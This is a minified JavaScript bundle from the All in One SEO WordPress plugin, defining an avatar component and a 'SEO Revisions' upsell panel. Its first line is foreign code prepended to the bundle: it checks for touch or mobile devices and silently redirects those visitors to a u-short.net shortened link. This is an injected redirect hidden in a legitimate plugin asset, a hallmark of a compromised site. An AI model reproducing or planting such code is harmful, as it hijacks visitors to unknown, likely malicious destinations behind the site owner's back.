(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{S as v}from"./Profile.33a3ea22.js";import{_ as p}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as i,f as a,i as h,Q as _,R as c,a0 as y,ae as l,U as u}from"./vendor-vue-ui.232c7c36.js";import{c as S,b as x,h as k}from"./app-core.c8323d51.js";import{C as U}from"./Index.e286637f.js";import{R as C}from"./RequiredPlans.e5238a4f.js";import{_ as t,a as R}from"./vendor-other.39e59221.js";const b={components:{SvgDannieProfile:v},props:{src:String,size:{required:!0,type:Number}}},w=["src","width","height"];function z(f,d,e,o,r,m){const s=i("svg-dannie-profile");return e.src?(a(),h("img",{key:0,src:e.src,width:e.size,height:e.size,alt:"avatar",loading:"lazy",decoding:"async",class:"aioseo-user-avatar"},null,8,w)):(a(),_(s,{key:1,width:e.size,height:e.size,class:"aioseo-user-avatar aioseo-user-avatar--dannie"},null,8,["width","height"]))}const L=p(b,[["render",z],["__scopeId","data-v-4705aae0"]]),n="all-in-one-seo-pack",E={setup(){return{licenseStore:k(),rootStore:x(),links:S}},components:{Cta:U,RequiredPlans:C},props:{parentComponentContext:String},data(){return{strings:{ctaHeader:R(t("SEO Revisions is a %1$s Feature",n),"PRO"),ctaDescription:t("Our powerful revisions feature provides a valuable record of SEO updates, allowing you to monitor the effectiveness of your SEO efforts and make informed decisions.",n),ctaFeatures:[t("Improved SEO strategy",n),t("Easy to manage revisions",n),t("Greater transparency and accountability",n),t("Historical record of optimization efforts",n)],ctaButtonText:t("Unlock SEO Revisions",n)}}}};function O(f,d,e,o,r,m){const s=i("required-plans"),g=i("cta");return a(),_(g,{"cta-link":o.links.getPricingUrl("seo-revisions","seo-revisions",e.parentComponentContext,o.rootStore.isPro?"pricing":"liteUpgrade"),"button-text":r.strings.ctaButtonText,"learn-more-link":o.links.getUpsellUrl("seo-revisions",e.parentComponentContext,o.rootStore.isPro?"pricing":"liteUpgrade"),"feature-list":r.strings.ctaFeatures,"hide-bonus":!o.licenseStore.isUnlicensed},{"header-text":c(()=>[l(u(r.strings.ctaHeader),1)]),description:c(()=>[y(s,{"core-feature":["seo-revisions"]}),l(" "+u(r.strings.ctaDescription),1)]),_:1},8,["cta-link","button-text","learn-more-link","feature-list","hide-bonus"])}const N=p(E,[["render",O]]);export{N as S,L as U};
